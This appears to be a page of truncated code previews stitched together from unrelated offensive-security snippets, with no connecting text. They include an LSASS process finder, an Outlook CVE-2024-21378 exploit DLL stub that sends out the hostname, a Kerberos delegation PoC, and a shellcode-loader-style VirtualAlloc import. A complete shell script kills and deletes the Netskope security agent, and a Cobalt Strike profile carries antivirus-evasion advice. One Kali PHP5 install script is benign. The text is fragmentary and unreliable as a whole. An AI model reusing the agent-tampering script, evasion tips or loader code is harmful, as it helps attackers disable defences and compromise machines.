#define _CRT_SECURE_NO_WARNINGS | |
#include <Windows.h> | |
#include <Psapi.h> | |
#include <TlHelp32.h> | |
#include <iostream> | |
DWORD GetLsassPid() { | |
PROCESSENTRY32 entry; | |
entry.dwSize = sizeof(PROCESSENTRY32); |
/** | |
* This DLL is designed for use in conjunction with the Ruler tool for | |
* security testing related to the CVE-2024-21378 vulnerability, | |
* specifically targeting MS Outlook. | |
* | |
* It can be used with the following command line syntax: | |
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
* | |
* After being loaded into MS Outlook, it sends the PC's hostname and |
#!/usr/bin/env python | |
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
# this is a *very* rough PoC | |
import SimpleHTTPServer | |
import SocketServer | |
import base64 | |
import random | |
import struct |
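# Install PHP 5 and its Apache module on a Kali host from the old "sana"
# package source, switch Apache from the PHP 7.0 module to PHP 5, and start
# MySQL. Presumably run as root: the first commands write
# /etc/apt/sources.list and call apt-get without sudo.
#
# NOTE(review): the source below is fetched over plain http:// and PHP 5 is
# end-of-life, so packages installed from it no longer receive security
# fixes. Keep this to an isolated lab machine, and drop the extra source line
# from /etc/apt/sources.list once the install is done so later upgrades do
# not keep resolving against it.
sana_source='deb http://old.kali.org/kali sana main non-free contrib'

# Add the source only once; a bare `>>` appended a duplicate entry on every run.
grep -qxF "$sana_source" /etc/apt/sources.list 2>/dev/null || echo "$sana_source" >> /etc/apt/sources.list
apt-get update
apt-get -y install php5 libapache2-mod-php5 php5-mysql php5-curl php5-gd php5-intl php5-imap php5-mcrypt php5-pspell php5-recode php5-tidy php5-xmlrpc php5-xsl
# Disable the PHP 7.0 Apache module, enable PHP 5, then restart Apache to load it.
a2dismod php7.0 ; sudo a2enmod php5 ; sudo service apache2 restart
service mysql start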
using System; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
namespace UnmanagedCode | |
{ | |
class Program | |
{ | |
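/// <summary>
/// P/Invoke declaration for the Win32 <c>VirtualAlloc</c> function in kernel32,
/// which reserves and/or commits a region of pages in the calling process.
/// </summary>
/// <param name="ptr">Requested start address of the region (native <c>lpAddress</c>); <see cref="IntPtr.Zero"/> lets the system choose.</param>
/// <param name="size">Size of the region in bytes (native <c>dwSize</c>).</param>
/// <param name="type">Allocation type flags (native <c>flAllocationType</c>).</param>
/// <param name="mode">Memory protection for the region (native <c>flProtect</c>).</param>
/// <returns>Base address of the allocated region, or <see cref="IntPtr.Zero"/> on failure.</returns>
/// <remarks>
/// SetLastError is enabled so a caller can read the failure reason with
/// <c>Marshal.GetLastWin32Error()</c> when the call returns <see cref="IntPtr.Zero"/>.
/// NOTE(review): the native allocation-type and protection parameters are 32-bit DWORDs;
/// they are declared as IntPtr here and left that way so existing callers keep compiling.
/// <c>uint</c> would match the native signature.
/// </remarks>
[DllImport("kernel32", SetLastError = true)]
static extern IntPtr VirtualAlloc(IntPtr ptr, IntPtr size, IntPtr type, IntPtr mode);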
#!/bin/sh | |
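# Force-stop every process whose `ps aux` line mentions "Netskope": the PID
# (column 2) of each match is turned into a `kill -9 <pid>` command and the
# resulting list is executed by a root shell. `grep -v grep` keeps the grep
# process itself out of the match list.
sudo ps aux | grep Netskope | grep -v grep | awk '{ print "kill -9", $2 }' | sudo sh
echo '[✓] Kill Netskope Process'
# Delete the "Remove Netskope Client" app bundle (presumably the vendor's own uninstaller).
sudo rm -rf /Applications/Remove\ Netskope\ Client.app
echo '[✓] Removed Remove Netskope Client.app'
# Delete the client's directory under /Library/Application Support.
sudo rm -rf /Library/Application\ Support/Netskope
echo '[✓] Removed Agent of Netskope Client.app'
# NOTE(review): every echo runs unconditionally, so a [✓] line does not show
# that the kill or rm before it actually succeeded.
# Defender note: this removes the client without going through its uninstaller.
# On a managed fleet, a SIGKILL of the client followed by deletion of these two
# paths, or the endpoint going silent in the management console, is worth
# alerting on as agent tampering.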
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures) | |
# as stage0, remote injecting a thread into a suspended process works | |
set host_stage "false"; | |
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"; | |
set sleeptime "10000"; | |
stage { | |
set allocator "MapViewOfFile"; | |
set name "notevil.dll"; |
// memBruteforce.cpp by aaaddress1@chroot.org
// brute-force search for loaded modules in memory
// rewritten from https://www.exploit-db.com/exploits/45293
#include <Windows.h> | |
#include <iostream> | |
#pragma warning(disable:4996) | |
bool isMemExist(size_t addr) { | |
int retv; | |
__asm { |